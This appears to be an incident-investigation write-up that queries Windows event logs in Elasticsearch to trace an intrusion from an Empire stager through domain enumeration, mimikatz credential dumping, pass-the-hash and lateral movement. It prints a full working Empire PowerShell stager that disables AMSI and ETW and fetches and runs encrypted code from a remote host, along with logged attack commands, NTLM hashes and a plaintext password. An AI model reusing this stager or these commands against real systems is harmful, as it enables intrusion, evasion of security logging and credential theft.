If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=TpmUDibXpfiUU1/mwqwmentgb3I=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d
http://cdn.bananapeelparty.net:80
It is an Empire stager and calls back to cdn.bananapeelparty.net:80
or 165.232.170.151:80
:
$ cat query_net.json
{
"query":{
"bool": {
"must": {
"term": {
"process.pid": "6160"
}
},
"should": [{
"match": {
"event.category": "network"
}
}],
"filter": {
"range": {
"@timestamp": {
"gte": "2023-08-29T00:00:00",
"lte": "2023-08-31T00:00:00"
}
}
}
}
},
"_source": ["@timestamp", "host.hostname", "source.ip", "source.port", "destination.ip", "destination.port"]
}
$ curl -d "$(cat query_net.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | jq -r '"\(.host.hostname)\t\(.destination.ip):\(.destination.port)"' | sort | uniq -c | sort -nr
2424 WKSTN-0051 165.232.170.151:80
23 WKSTN-0051 null:null
5 WKSTN-0051 10.10.97.43:389
2 WKSTN-0051 185.199.110.133:443
1 WKSTN-0051 185.199.111.133:443
1 WKSTN-0051 185.199.109.133:443
1 WKSTN-0051 140.82.121.3:443
Following the commands associated with the Empire stager, the attacker performed enumeration targeting the domain and proceeded to download and execute mimikatz.exe
where they were able to authenticate as itadmin
via Pass-the-Hash:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160
[..omitted..]
2023-08-29T23:55:17.945Z evan.hutchinson 4896 6160 "C:\Windows\system32\cmd.exe" /c "whoami /all"
2023-08-30T00:06:38.162Z evan.hutchinson 7736 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainComputer"
2023-08-30T00:08:56.421Z evan.hutchinson 6328 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-Domain"
2023-08-30T00:09:23.529Z evan.hutchinson 4844 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainUser"
2023-08-30T00:09:57.186Z evan.hutchinson 6968 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
2023-08-30T00:10:15.314Z evan.hutchinson 5532 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
2023-08-30T00:11:26.438Z evan.hutchinson 4948 6160 "C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2023-08-30T00:13:37.090Z evan.hutchinson 1892 6160 "C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
[..omitted..]
Using Invoke-ShareFinder
from PowerView.ps1
, the attacker seems to have discovered credentials for allan.smith
in a file named, IT_Automation.ps1
, and executed commands on WKSTN-1327
remotely via Invoke-Command
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160
[..omitted..]
2023-08-30T00:14:36.078Z evan.hutchinson 3312 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Invoke-ShareFinder"
2023-08-30T00:18:38.647Z evan.hutchinson 3288 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "ls FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles"
2023-08-30T00:19:52.889Z evan.hutchinson 4820 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "cat FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles\IT_Automation.ps1"
2023-08-30T00:20:23.384Z evan.hutchinson 7952 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList (" "QUICKLOGISTICS\allan.smith, (ConvertTo-SecureString Tr!ckyP@ssw0rd987 -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
2023-08-30T00:20:56.818Z evan.hutchinson 6848 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
[..omitted..]
Another Empire stager was executed on the new workstation using the same method:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160
[..omitted..]
2023-08-30T00:21:52.606Z evan.hutchinson 4976 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
$ echo 'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA' | base64 -d
http://cdn.bananapeelparty.net:80
Confirming if the Invoke-Command
executions were successful, it can be seen that the commands were spawned via wsmprovhost.exe
meaning the attempt went through:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort
2023-08-30T00:20:59.159Z allan.smith 4892 752 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T00:20:59.718Z allan.smith 5076 4892 "C:\Windows\system32\whoami.exe"
2023-08-30T00:21:53.053Z allan.smith 6788 752 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T00:21:53.284Z allan.smith 6708 6788 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
[..omitted..]
It seems that allan.smith
is a Local Administrator on the workstation and the attacker leveraged the fact by dumping credentials via a downloaded mimikatz.exe
. This time, revealing the NTLM hash of the Domain Administrator, Administrator
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6708
[..omitted..]
2023-08-30T00:22:15.913Z allan.smith 5128 6708 "C:\Windows\system32\cmd.exe" /c hostname
2023-08-30T00:22:22.315Z allan.smith 5096 6708 "C:\Windows\system32\cmd.exe" /c "whoami /all"
2023-08-30T01:28:22.638Z allan.smith 6612 6708 "C:\Windows\system32\more.com"
2023-08-30T01:29:09.409Z allan.smith 1812 6708 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
2023-08-30T01:29:39.620Z allan.smith 6528 6708 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
2023-08-30T01:30:25.545Z allan.smith 2056 6708 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
2023-08-30T01:30:51.647Z allan.smith 6736 6708 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2023-08-30T01:31:39.366Z allan.smith 6236 6708 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:QUICKLOGISTICS /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
[..omitted..]
The Empire stager was run again then the attacker used Invoke-Command
once again to execute commands remotely on DC01
as well as establish persistence via schtasks.exe
on WKSTN-1327
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 2780
2023-08-30T01:40:38.541Z allan.smith 2780 752 C:\Windows\system32\wsmprovhost.exe -Embedding
